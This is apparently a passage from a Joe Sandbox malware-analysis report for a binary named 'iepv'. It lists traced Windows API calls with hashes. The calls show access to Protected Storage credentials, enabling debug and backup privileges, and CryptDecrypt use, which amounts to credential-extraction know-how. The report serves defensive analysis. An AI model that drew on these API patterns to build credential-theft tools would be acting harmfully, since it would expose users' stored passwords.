                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: Library$AddressFreeLoadProc
                                        • String ID: PStoreCreateInstance$pstorec.dll
                                        • API String ID: 145871493-2881415372

                                        Control-flow Graph: function 00409E6B (graph image omitted)
                                        APIs
                                          • Part of subcall function 0040BFA0: GetCurrentProcess.KERNEL32(?), ref: 0040BFAF
                                          • Part of subcall function 0040BFA0: GetLastError.KERNEL32(00000000), ref: 0040BFC1
                                          • Part of subcall function 0040BFA0: GetProcAddress.KERNEL32(00000000,LookupPrivilegeValueA), ref: 0040BFE1
                                          • Part of subcall function 0040BFA0: LookupPrivilegeValueA.ADVAPI32(00000000,?,?), ref: 0040BFEF
                                          • Part of subcall function 0040BFA0: GetProcAddress.KERNEL32(00000000,AdjustTokenPrivileges), ref: 0040C015
                                          • Part of subcall function 0040BFA0: AdjustTokenPrivileges.KERNELBASE(?,00000000,00000001,00000000,00000000,00000000), ref: 0040C026
                                          • Part of subcall function 0040BFA0: GetLastError.KERNEL32(00000000), ref: 0040C028
                                          • Part of subcall function 0040BFA0: CloseHandle.KERNELBASE(?), ref: 0040C033
                                        • FreeLibrary.KERNEL32(00000000,SeBackupPrivilege,SeRestorePrivilege,SeDebugPrivilege), ref: 00409EA4
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: AddressErrorLastProc$AdjustCloseCurrentFreeHandleLibraryLookupPrivilegePrivilegesProcessTokenValue
                                        • String ID: SeBackupPrivilege$SeDebugPrivilege$SeRestorePrivilege
                                        • API String ID: 1186303178-2063704729
                                        APIs
                                        • memset.MSVCRT ref: 0040CBBA
                                          • Part of subcall function 00405D12: sprintf.MSVCRT ref: 00405D4A
                                          • Part of subcall function 00405D12: memcpy.MSVCRT(?,00000000,00000003,00000000,%2.2X ,?), ref: 00405D5D
                                        • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 0040CBDE
                                        • memset.MSVCRT ref: 0040CBF6
                                        • GetPrivateProfileStringA.KERNEL32(?,?,0040E470,?,00002000,?), ref: 0040CC14
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: PrivateProfileStringmemset$Writememcpysprintf
                                        • String ID:
                                        • API String ID: 3143880245-0
                                        APIs
                                        • FindResourceA.KERNEL32(?,?,?), ref: 0040CE31
                                        • SizeofResource.KERNEL32(?,00000000), ref: 0040CE42
                                        • LoadResource.KERNEL32(?,00000000), ref: 0040CE52
                                        • LockResource.KERNEL32(00000000), ref: 0040CE5D
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: Resource$FindLoadLockSizeof
                                        • String ID:
                                        • API String ID: 3473537107-0
                                        APIs
                                          • Part of subcall function 004085DD: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004085FF
                                          • Part of subcall function 004085DD: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00408694
                                        • GetStdHandle.KERNEL32(000000F5), ref: 00409757
                                        • CloseHandle.KERNELBASE(?), ref: 0040984A
                                        • SetCursor.USER32 ref: 00409856
                                          • Part of subcall function 0040548F: CreateFileA.KERNELBASE(00000002,40000000,00000001,00000000,00000002,00000000,00000000,004095DB,00000000), ref: 004054A1
                                          • Part of subcall function 004054EC: GetLastError.KERNEL32 ref: 004054FC
                                          • Part of subcall function 004054EC: sprintf.MSVCRT ref: 00405524
                                          • Part of subcall function 004054EC: MessageBoxA.USER32(?,?,Error,00000030), ref: 0040553D
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: Handle$??2@??3@CloseCreateCursorErrorFileLastMessagesprintf
                                        • String ID:
                                        • API String ID: 3976026410-0
                                        • Opcode ID: 3ec1295a7d23fb20ca59bfd635dcb7240a0cc71ea91f5bed571e3bf4b17c1ade
                                        • Instruction ID: 1fd2cf4f868221cd8e5376e14e07cf60bda6352084dba89875c8c524ee2be8da
                                        • Opcode Fuzzy Hash: 3ec1295a7d23fb20ca59bfd635dcb7240a0cc71ea91f5bed571e3bf4b17c1ade
                                        • Instruction Fuzzy Hash: A5416232610100EBDB256F69C988B9F77B5AF45321F21446AF446B73E2CB789D80CB18
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: strlen$FileFindFirst
                                        • String ID: ;k@$index.dat
                                        • API String ID: 2516927864-3649366552
                                        • Opcode ID: 358f8c5c7c82daf82593cc25d8059e0e4fd8a016a767248c66992a1bf2dde3ef
                                        • Instruction ID: e53b20a2827c34f246cd8cb1df9afdee6a57a968a8ea5e85fd39d2dfd86dbec5
                                        • Opcode Fuzzy Hash: 358f8c5c7c82daf82593cc25d8059e0e4fd8a016a767248c66992a1bf2dde3ef
                                        • Instruction Fuzzy Hash: 9601963190162C5DCF20E7658C017DA77B89B15305F1181FBB806B21C1DB389B558FAA
                                        APIs
                                        • memset.MSVCRT ref: 00406AE2
                                          • Part of subcall function 0040CCAF: RegCloseKey.ADVAPI32(?,?,?,00406B01,?,?,00000104,?), ref: 0040CCEF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: Closememset
                                        • String ID: :$:
                                        • API String ID: 2732369425-3780739392
                                        • Opcode ID: 8c3508ec9aea650201ac757f06dab352662364cf1105d935cd1811f48ca154aa
                                        • Instruction ID: d5b43d1bdddb0f3543c83bf4e5e7cd6aa53e09a9d76f36242e1da3e87a1288bc
                                        • Opcode Fuzzy Hash: 8c3508ec9aea650201ac757f06dab352662364cf1105d935cd1811f48ca154aa
                                        • Instruction Fuzzy Hash: 46F0A9B19082A899DF619A15CC417C67FB85F51308F0440FAD9CDB91C6C6B86AC9CB65
                                        APIs
                                        • malloc.MSVCRT ref: 00405724
                                        • memcpy.MSVCRT(00000000,00000000,?,00000000,?,0040295B,00000001,?,?,00000000,00401BF3,?), ref: 0040573C
                                        • free.MSVCRT ref: 00405745
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: freemallocmemcpy
                                        • String ID:
                                        • API String ID: 3056473165-0
                                        • Opcode ID: 62c4af55305529f409e0bea1128188acda5818f3ef7132d5372e6b59438fdacf
                                        • Instruction ID: 4204a681243c151887bf5a025ea2ecca069ec2e95ee5ad48d59c4fbeff38a6aa
                                        • Opcode Fuzzy Hash: 62c4af55305529f409e0bea1128188acda5818f3ef7132d5372e6b59438fdacf
                                        • Instruction Fuzzy Hash: AAF08972A056119FCB08AA79A98585B739DEF44324B11483FF514E72C2D738AC44DF68
                                        APIs
                                          • Part of subcall function 0040579F: memset.MSVCRT ref: 004057A9
                                          • Part of subcall function 0040579F: _mbscpy.MSVCRT(?,?,?,00000000,0000003C,?,?,0040109D,MS Sans Serif,0000000A,00000001), ref: 004057E9
                                        • CreateFontIndirectA.GDI32(?), ref: 004058DB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: CreateFontIndirect_mbscpymemset
                                        • String ID: Arial
                                        • API String ID: 3853255127-493054409
                                        • Opcode ID: 1475a2599611ba5e21b7c36d255b81c75028fc7fc182827917e312dffb651d24
                                        • Instruction ID: d0421fbc028c2d2d7161884e1009b6c32f17e61fe4a3a6cab89604017957388c
                                        • Opcode Fuzzy Hash: 1475a2599611ba5e21b7c36d255b81c75028fc7fc182827917e312dffb651d24
                                        • Instruction Fuzzy Hash: 81D0C960D4020DB6E604B6A1FD4BF49B76C5B00704F504831B941F61E1AAF4A1158699
                                        APIs
                                        • GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 0040CC60
                                          • Part of subcall function 0040CB45: memset.MSVCRT ref: 0040CB63
                                          • Part of subcall function 0040CB45: _itoa.MSVCRT ref: 0040CB7A
                                          • Part of subcall function 0040CB45: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 0040CB89
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: PrivateProfile$StringWrite_itoamemset
                                        • String ID:
                                        • API String ID: 4165544737-0
                                        • Opcode ID: b9946992e16449c93204427860f5bd2c5f6b941805b55aa7f7a6f4de4f9adaeb
                                        • Instruction ID: 525d1b5333d9bc9d1c2bfd393fbb628b7be0876f54a79b076e459529c23fafa1
                                        • Opcode Fuzzy Hash: b9946992e16449c93204427860f5bd2c5f6b941805b55aa7f7a6f4de4f9adaeb
                                        • Instruction Fuzzy Hash: 88E0B632004209EBDF125F85ED01AA97B76FF04315F148969FA5C15160D33295B0EB84
                                        APIs
                                        • CreateFileA.KERNELBASE(00000003,80000000,00000001,00000000,00000003,00000000,00000000,00402A1C,9+@,00000001,00000000,?,00402B39), ref: 00405488
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: CreateFile
                                        • String ID:
                                        • API String ID: 823142352-0
                                        • Opcode ID: 76eb41ef98c2c5641d3abcf42bcff8ef1eb90f0748ddb7ccec5cb06513cf706a
                                        • Instruction ID: 6cc17ecc0e63add31f30c7be5c96cb6e6d50dce7e189e56331532518d042fa2d
                                        • Opcode Fuzzy Hash: 76eb41ef98c2c5641d3abcf42bcff8ef1eb90f0748ddb7ccec5cb06513cf706a
                                        • Instruction Fuzzy Hash: D5C092B0260200BEFE214B12AE15F36255DE740700F2008647E10F40E0C1A14D208525
                                        APIs
                                        • CreateFileA.KERNELBASE(00000002,40000000,00000001,00000000,00000002,00000000,00000000,004095DB,00000000), ref: 004054A1
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: CreateFile
                                        • String ID:
                                        • API String ID: 823142352-0
                                        • Opcode ID: fbde9cd00fe5eff3766847e957dcecaf9640c7a61364f5c27615867091559b50
                                        • Instruction ID: 69dfb5ecf65624069a56b7d842b5eb645239c70c77c1b81269cf5ee0886f4079
                                        • Opcode Fuzzy Hash: fbde9cd00fe5eff3766847e957dcecaf9640c7a61364f5c27615867091559b50
                                        • Instruction Fuzzy Hash: 48C092F0260200BEFE204B12AE0AF37255DE780700F1048607A10E40E0C2A14C108525
                                        APIs
                                        • FindClose.KERNELBASE(?,004063A7,?,?,?,00000000,00402B0C,?,?,?,?), ref: 0040649B
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: CloseFind
                                        • String ID:
                                        • API String ID: 1863332320-0
                                        • Opcode ID: 571febb4c9117fa6e2e56abce36b66c01aacd5c5f760bc13c6d008cbdab551c8
                                        • Instruction ID: 787eb9efbf0ebf0b4d30fb47fd0eb3d90729e22c384964ea5156421acb3fcbf6
                                        • Opcode Fuzzy Hash: 571febb4c9117fa6e2e56abce36b66c01aacd5c5f760bc13c6d008cbdab551c8
                                        • Instruction Fuzzy Hash: 19C048301105019AE62C5B389C5942A76A0AE493343A50F6CA0F3A20E1E77894A28A08
                                        APIs
                                        • FreeLibrary.KERNELBASE(?,0040C8C6), ref: 0040C8AF
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: FreeLibrary
                                        • String ID:
                                        • API String ID: 3664257935-0
                                        • Opcode ID: 738ff6e65df157840b9e3526bb30d1cb88ea11130717a0abe25991770deb834c
                                        • Instruction ID: 5a87ee5de1accfd3d1346c83d84d08fc20fb9a256ad619443e5e62a78e09debb
                                        • Opcode Fuzzy Hash: 738ff6e65df157840b9e3526bb30d1cb88ea11130717a0abe25991770deb834c
                                        • Instruction Fuzzy Hash: 89C04C351107018BF7219B12C949753B3E4AB00317F40C869955A95494D77CE454CF18
                                        APIs
                                        • EnumResourceNamesA.KERNEL32(?,?,Function_0000CE24,00000000), ref: 0040CEB9
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: EnumNamesResource
                                        • String ID:
                                        • API String ID: 3334572018-0
                                        • Opcode ID: 9b69f4405ee7bceacd210861de9929361b8f47e7f5b745cdf287a2ae3b80fe65
                                        • Instruction ID: a509d141f3c30914f5d5577e3380947a12cb56614181ed463bd12314e25f5cfc
                                        • Opcode Fuzzy Hash: 9b69f4405ee7bceacd210861de9929361b8f47e7f5b745cdf287a2ae3b80fe65
                                        • Instruction Fuzzy Hash: F5C09B31154341D7C7019F10CD05F1B76D5FB58705F104C397161A40E0D7B144249606
                                        APIs
                                        • GetFileAttributesA.KERNELBASE(?,00403409,?,?,?,?,00000000,00402C40,?), ref: 0040575D
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: AttributesFile
                                        • String ID:
                                        • API String ID: 3188754299-0
                                        • Opcode ID: 423b3543d23d905c1eb81c7593e2c8edc8dbd98a56069c9372583ff1f61cd85b
                                        • Instruction ID: dcdad8297477f55eff4f6dd966050ac13875044b2d9d182873d2844fa248ead6
                                        • Opcode Fuzzy Hash: 423b3543d23d905c1eb81c7593e2c8edc8dbd98a56069c9372583ff1f61cd85b
                                        • Instruction Fuzzy Hash: 5CB092752200004BCA0807349D8904D35906B48721B200B28B063D40E0D7308860AA00
                                        APIs
                                          • Part of subcall function 00405F72: free.MSVCRT ref: 00405F75
                                          • Part of subcall function 00405F72: free.MSVCRT ref: 00405F7D
                                        • free.MSVCRT ref: 0040627E
                                          • Part of subcall function 0040609F: free.MSVCRT ref: 004060AE
                                          • Part of subcall function 00405708: malloc.MSVCRT ref: 00405724
                                          • Part of subcall function 00405708: memcpy.MSVCRT(00000000,00000000,?,00000000,?,0040295B,00000001,?,?,00000000,00401BF3,?), ref: 0040573C
                                          • Part of subcall function 00405708: free.MSVCRT ref: 00405745
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: free$mallocmemcpy
                                        • String ID:
                                        • API String ID: 3401966785-0
                                        • Opcode ID: 8b5e8f0689b70730765747be11f963899eb1e8a025482a5f5190dc96ffae25fd
                                        • Instruction ID: e5a7c9e5946f31c6abdfc8041d783d09298c05f7c1d7196976ea6ac68c26f342
                                        • Opcode Fuzzy Hash: 8b5e8f0689b70730765747be11f963899eb1e8a025482a5f5190dc96ffae25fd
                                        • Instruction Fuzzy Hash: AE414975D002099FCB20EF99C48059EBBB2BB49324F2541BFD856B7381C738AE96CB55
                                        APIs
                                        • memcmp.MSVCRT(?,0000000C,00000005,-000000F4,?,00000000), ref: 00403CA0
                                        • memset.MSVCRT ref: 00403CC0
                                        • memset.MSVCRT ref: 00403CDB
                                          • Part of subcall function 00403923: memset.MSVCRT ref: 0040393E
                                          • Part of subcall function 00403923: _snprintf.MSVCRT ref: 004039A5
                                        • memset.MSVCRT ref: 00403D14
                                        • memset.MSVCRT ref: 00403D30
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,0000003F,?,?,?,?,?,?), ref: 00403D4C
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,000000FF,?,?,?,?,?,?), ref: 00403D66
                                          • Part of subcall function 0040381F: wcslen.MSVCRT ref: 00403845
                                          • Part of subcall function 0040381F: wcslen.MSVCRT ref: 0040385C
                                          • Part of subcall function 00403A7B: GetFileSize.KERNEL32(00000000,00000000,000000D0,?,00000000), ref: 00403AA2
                                          • Part of subcall function 00403A7B: memset.MSVCRT ref: 00403ACA
                                          • Part of subcall function 00403A7B: CloseHandle.KERNEL32(00000000), ref: 00403AE3
                                          • Part of subcall function 00403A7B: memset.MSVCRT ref: 00403B02
                                          • Part of subcall function 00403A7B: memcpy.MSVCRT(?,?,00000010,?,00000000,00000027), ref: 00403B14
                                          • Part of subcall function 00403A7B: memset.MSVCRT ref: 00403B64
                                          • Part of subcall function 00403A7B: memset.MSVCRT ref: 00403B78
                                          • Part of subcall function 00403A7B: memcpy.MSVCRT(?,?,00000300,?,?,?,?,?,?), ref: 00403BA4
                                        • memcmp.MSVCRT(?,?,00000014,?,00000001,0040323B,?,00000002,-000000D3,?,000000D0,?,?,?,?,?), ref: 00403E3E
                                        • LocalAlloc.KERNEL32(00000040,00000000,?,?,?,?,?,?,?,?,?), ref: 00403E4F
                                        • memcpy.MSVCRT(00000000,?,00000000,?,?,000000D0,0040323B,?,?,?,?,?,?,?), ref: 00403E85
                                        • CryptDecrypt.ADVAPI32(000000D0,00000000,00000001,00000000,00000000,00000000,?,?,?,000000D0,0040323B,?,?,?,?,?), ref: 00403E99
                                        • LocalFree.KERNEL32(00000000,?,?,?,000000D0,0040323B,?,?,?,?,?,?,?), ref: 00403EB4
